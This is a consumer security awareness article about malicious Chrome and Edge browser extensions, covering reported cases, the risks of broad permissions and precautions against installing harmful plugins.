Dangers of Malicious Browser Extensions.

[Fixxx]

Researchers from ReasonLabs have reported a new wave of attacks on users of Chrome and Edge browsers through malicious extensions. Cybercriminals distribute software via fake web pages but, as practice shows, malicious extensions can also be found in official stores. In this article, we will discuss the capabilities of browser plugins, how to distinguish dangerous software and how not to become a victim of cybercriminals.

How Malicious Extensions Work​

Browser extensions are software that allows users to enhance the functionality of their browsers. Legitimate extensions have useful features and can significantly ease user's lives, for example: removing pop-up requests for cookie permissions, blocking ads, storing passwords, helping maintain focus or limit time on certain sites, translating text, saving useful tabs and much more. However, not all extensions are safe. Cybercriminals disguise malicious programs as useful and seemingly harmless tools.

• Malicious extensions often hide under the names of well-known services. Scammers exploit people's trust in popular applications, masking malicious software under their functionality. There have been cases where users downloaded an extension called Chat GPT For Google and then lost access to their social media accounts.
• Malicious extensions can masquerade as free programs. In this case, installers add a package of extensions to the browser along with the application, which the user may only discover after rebooting the device. Such extensions include pop-up ads that are difficult to get rid of or change the homepage to an obscure search engine that tracks user queries.

To spread their malicious software, cybercriminals create fake pages or disguise it as existing extensions. Sometimes the clones are so skillful that it's almost impossible for a non-specialist to distinguish fake software. An example is the Copyfish extension, which was used for text recognition in images. One of the developers fell victim to phishing and cybercriminals seized the extension's code. Subsequently, they created a clone of Copyfish that inserted ads on the pages visited by the user.

To remain unnoticed, malicious extensions use various masking methods. They often imitate popular and legitimate applications by copying their names, icons and descriptions so that users don't suspect anything suspicious. Another method is to change functionality after installation: initially, the extension behaves legitimately and then, after some time, begins to perform malicious actions. Some extensions minimize their visible activity to avoid attracting attention, operating in the background.​

Any user familiar with basic cybersecurity rules knows that software should only be downloaded from reliable, verified sources. However, this is not a guarantee of safety. For instance, cybersecurity researcher Vladimir Palant discovered suspicious code in the PDF Toolbox extension, which was used for working with documents for Google Chrome. Palant continued his search and found another 34 malicious programs in the Chrome Web Store, with a total number of downloads amounting to 87 million times. After several publications, Google removed the dangerous extensions from its store.

Extensions are always visible; unlike scripts and trojans, they can be found in the list of installed extensions, meaning they often look like real legitimate tools. Often, a malicious extension does perform the function it claims, for example, it may be a copy of a legitimate extension, but it also performs malicious functions. If an extension was downloaded not from the store but, for example, via a trojan, cybercriminals may try to protect the extension from removal using a task scheduler or startup objects. If the extension reappears in the list after being removed, this is definitely a reason to investigate the situation carefully.​

What is the Danger​

To perform their functions, browser extensions request permission from the user for their actions and access to data. Usually, users need to check a box for "View and change your data on all sites". This way, the software gains the ability to monitor all your actions in the browser and can change the content of the opened pages.

The problem is that it's not always possible to determine the safety of an extension, even of an official application, just by reading its permission description. Sometimes the wording is so vague that it's difficult to understand what exactly the extension can do with your data. For example, many extensions require permission to "view and change your data on all sites". This may indeed be necessary for their operation, but such permission grants them almost unlimited rights and can be used for malicious purposes. For large companies, this is also a threat: an employee may store passwords for work email in notes on their phone, thus providing a seemingly harmless application with full access to company data.​

The functionality of even a harmless extension allows it to potentially perform the following actions:

• Collect information about your actions on websites;
• See confidential information, including card data, logins and passwords;
• Replace links in search results;
• Display any ads.

Such capabilities of browser extensions create serious risks for information security. Even if an extension was not initially malicious, its functions may change over time. For example, this happened with Nano Defender and Nano Adblocker. The product was used to bypass ad-blocking protection mechanisms on websites. According to the Chrome Web Store, Nano Defender had over 200k users, while Nano Adblocker had over 100k users when the owner sold it to Turkish developers. After the deal, the new owners uploaded updated versions of the extensions to the store, in which researchers discovered a new file, connect.js. It turned out that the new code fragment allowed developers to send user activity data to remote servers.

​

All types of malicious extensions are dangerous in their own way, and it is difficult to single out one as the most dangerous type. There are extensions that directly steal cryptocurrency – they cause clear and direct harm. However, there are extensions that intercept social media accounts and can even alter search engine results. The damage from such extensions can be much more significant, but over a longer period. Identifying such extensions is quite challenging because even in official extension stores, malicious ones can be found.​

In online stores, you can find extensions for every taste and with useful functionality. Friends and colleagues share links and recommend finds to each other. This creates another danger - users download a bunch of extensions without thinking, paying no attention to security. For example, the popular free plugin Hola VPN, which was embroiled in a scandal in 2015. Researchers discovered a number of vulnerabilities in the extension and accused Hola of commercially exploiting user's internet channels and abusing Hola's capabilities to launch DDoS attacks.

Malicious extensions use various masking methods. One of them is disguising as popular extensions, where malicious programs copy the names and icons of well-known applications to mislead users. Additionally, cybercriminals use fake reviews and ratings, creating false high ratings and positive reviews to increase user trust. Some malicious extensions hide their activity, making it minimally noticeable to remain undetected longer.​

How to Protect Yourself​

As mentioned above, malicious extensions can remain in official stores for years. The reliability of software should be checked by store moderators, but cybercriminals often manage to bypass this filter and place their malicious extensions. Such extensions can be identified by the following signs:

• The extension requires excessive permissions, such as access to data on all sites or control over system settings.
• The browser's behavior changed after installing the extension: increased ads, new toolbars or bookmarks appeared.
• Your data or accounts were compromised after installing a new extension.

To avoid becoming a victim of cybercriminals, you should take precautions when installing: limit the number of extensions and remove unnecessary ones, independently check the reliability of the software by reading reviews in the store and searching for information about it online, read the list of requested permissions and use antivirus software. Here are some ways to independently check an extension for browser security:

• First, study user reviews and the overall rating of the extension. A low rating or negative reviews should raise suspicion.
• Then, review the permissions required by the extension. If it requests access that doesn't correspond to its functions (for example, access to browsing history for an ad blocker), this may indicate a potential threat.
• Investigate who the developer of the extension is. Verified vendors usually have official websites and support.
• Use antivirus programs. Some of them can scan extensions for malware.
• Also, pay attention to the frequency of updates for the extension. Frequent updates usually indicate greater reliability.
• Install extensions cautiously and always check their security to minimize potential risks.

It's also important to remember that if a malicious extension has been detected and removed from the store, it doesn't mean that it will automatically disappear from your device. Therefore, it's worth checking for its presence and removing it manually.

Conclusion​

Browser extensions have evolved from niche software into a full-fledged sub-economy of the internet industry. With the growing popularity of extensions, the number of malicious extensions has increased, posing a serious threat to user's security and privacy. Browser extensions have access to user data and can be used for stealing personal information, spreading malware and other illegal activities. However, the risk of infection can be significantly reduced by following simple precautions:

• Download extensions only from official stores;
• Limit the number of installed extensions;
• Use reliable protective solutions.

It's important to remember that even official stores can sometimes contain malicious extensions, so one should always exercise caution and attentiveness when choosing and installing extensions.